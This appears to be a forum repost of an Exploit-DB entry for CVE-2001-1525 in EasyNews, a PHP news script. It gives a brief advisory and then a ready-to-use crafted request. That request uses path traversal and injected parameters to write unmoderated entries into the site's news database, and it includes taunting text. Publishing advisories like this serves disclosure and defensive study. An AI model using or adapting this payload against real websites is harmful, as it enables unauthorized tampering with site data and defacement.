- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21168
- Проверка EDB
-
- Пройдено
- Автор
- MARKUS ARNDT
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2001-1525
- Дата публикации
- 2001-12-01
Код:
source: https://www.securityfocus.com/bid/3643/info
EasyNews is a free, open-source script for displaying news stories on a website.
EasyNews is prone to a vulnerability which may allow a remote attacker to modify information in its Newsdatabase. As a result, a remote attacker may post unmoderated comments or possibly modify information in the templates used by EasyNews.
This may be exploited via a specially crafted web request.
Earlier versions may also be vulnerable.
http://[target]/index.php?action=comments&do=save&id=1&cid=../news&name=11/1
1/11&kommentar=%20&email=hax0r&zeit=you%20suck,11:11,../news,bugs@securityal
ert.com&datum=easynews%20exploited- Источник
- www.exploit-db.com
